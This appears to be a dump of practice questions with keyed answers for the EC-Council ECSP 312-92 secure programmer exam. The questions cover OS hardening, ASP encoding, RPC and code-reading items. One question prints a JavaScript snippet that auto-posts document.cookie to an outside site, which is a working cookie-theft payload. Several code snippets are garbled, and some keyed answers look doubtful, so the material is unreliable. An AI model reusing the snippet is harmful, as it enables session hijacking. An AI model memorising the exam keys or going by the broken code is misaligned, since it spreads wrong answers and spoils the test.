EC-Council Certified Secure Programmer (ECSP) v6.0 (312-92)

Page:    1 / 7   
Total 102 questions

What is the security and cryptographic framework used in Mac OS X called?

  • A. AppleSecure
  • B. CSAPI
  • C. CDSA
  • D. Secure API


Answer : C

Kevin wants to use an SSL certificate from his Mac OS X server so that he can send and receive encrypted email. What would Kevin accomplish by typing in the following command? certtool c k=/Users/root/Library/Keychains/certkc

  • A. Remove any unnecessary permissions on the file "certkc"
  • B. Create keychain called "certkc"
  • C. Copy the root certificate of the server to the file "certkc"
  • D. Import encryption key into the file "certkc"


Answer : B

Fred has just finished developing a number of ASP pages that will be posted to his company's website. Fred does not want the page's source code viewed by anyone, so he decided to encode the pages to make the source code unusable. What will the following command accomplish? screnc /e asp *.* c:\tmp

  • A. Create an MD5 hash for all ASP files in the c:\tmp directory
  • B. Encode all ASP files in current directory as ASP files and place them in the c:\tmpdirectory
  • C. Encode all ASP files and place them in the c:\tmp directory
  • D. Encode all ASP files in in the c:\tmp and place them in the default IIS virtual directory


Answer : B

Jacob is the system administrator for his company, managing over 20 Linux-based servers.
Jacob wants to ensure that his servers are secure so he decides to add the following line to the /etc/sysctl.conf file: net.ipv4.conf.all.rp_filter = 1
What will this line accomplish?

  • A. Prevent spoofing of incoming packets that appear to be from the computer's defaultgateway
  • B. Prevent spoofing of incoming packets that appear to be from local machine
  • C. Allow incoming packets only from own subnet
  • D. Allow outgoing packets only through primary network card


Answer : B

What type of problem or error will result from the following statement? void f2b(void * arg, size_t len) char buffer[100]; long val = ...; long *ptr = ...; extern void (*f)(); memcpy(buff, arg, len);
*ptr = val;
f();
return;

  • A. Pointer subterfuge
  • B. Heap smashing
  • C. Virtual pointer smashing
  • D. Sign error


Answer : A

Gloria is the lead operation manager for a movie production company in Las Vegas. She has been asked with ensuring that the new movie created by the company will fit on one side of a DVD disk that will be sold to the public. If the movie mentioned is a full-length production and must fit on one side of the disk, what level of compression must Gloria use?

  • A. 100 Mb/s
  • B. 10.5 Mb/s
  • C. 3.8 Mb/s
  • D. 7.2 Mb/s


Answer : D

What functionality of the Oracle Identity Management system facilitates real-time integration of multiple directories and user repositories through a single LDAP service?

  • A. Access and Identity
  • B. Virtual directory
  • C. Federation
  • D. Provisioning


Answer : B

In the following socket programming code, who will the server allow connections from? int main(void) int s1, s2; s1 = socket(AF_INET, SOCK_STREAM, 0); sin.sin_port = htons(30); sin.sin_family = AF_INET; sin.sin_addr.s_addr = 0; bind(sockfd, (struct sockaddr *)&sin, sizeof(sin)); listen(sockfd, 10); s2 = accept(sockfd, 10); write(s2, "hello\n", 6)

  • A. Only those coming in on TCP port 10
  • B. Only those on the same subnet as the server
  • C. Only those coming in on UDP port 10
  • D. Anyone


Answer : D

When making a RPC function call on the local machine, what function should be used?

  • A. ncacn_ip_tcp
  • B. lclrpc
  • C. ncalrpc
  • D. get_local_rpc


Answer : C

Gerald is a web security consultant for Protectors International. Gerald's main responsibility is to search the Internet for malicious and deceitful sites that the public should be aware of.
Gerald was tipped off about a particular site and is now looking over its source code in a protected environment. Gerald finds the following snippet particularly interesting. What has
Gerald stumbled upon?
<script>
document.write('<form name=hack method=post action="http:// scarysite.com/getit.php">
<input type=hidden name=sid value="' + escape(document.cookie) +
'">');
document.hack.submit();
</script>

  • A. Hidden post command
  • B. Hidden form fields
  • C. JavaScript hijacking
  • D. XSS attack


Answer : B

What compression library is used by wiretap, the packet analyzer reader for Wireshark?

  • A. wtapbil
  • B. pclib
  • C. winrar
  • D. zllib


Answer : D

What is the following PERL script trying to accomplish?
sub mycode_string {
join(""
map('$_ > 255 ?
sprintf("\\x{%04x]", $_) :
chr($_) = ~ /[[:cntrl:]]/ ?
sprintf(\\x%02X", $_) :
chr($_)
} unpack("u*", $_[0]))l

  • A. Convert hexadecimal to Unicode
  • B. Display test as Unicode
  • C. Convert hexadecimal to text
  • D. Display Unicode as text


Answer : D

What will the following SQL command accomplish?

USE Accounting -

GO -

EXECUTE -
sp_grantdbaccess guest

  • A. Add guest user to the Accounting security group
  • B. Change default database for guest user to Accounting database
  • C. Add guest group to the Accounting database
  • D. Add guest user to the Accounting database


Answer : D

When a developer is creating port binding shell code, why should he/she not use the NULL characters?

  • A. Creates hardware call errors
  • B. Create firmware vulnerabilities with hardware
  • C. Create buffer overflow
  • D. Create open sockets


Answer : C

William is the lead programmer for Gummerson, Inc., a software company located in San
Francisco. Gummerson is looked upon as one of the leading software development companies for medical and health related applications. William believes that his company is so successful because they believe in involving the user or client in the design and development of the programs. What software development methodology does Gunnerson,
Inc. use when creating applications for clients?

  • A. Fountain
  • B. RAD
  • C. JAD
  • D. Waterfall


Answer : C

Page:    1 / 7   
Total 102 questions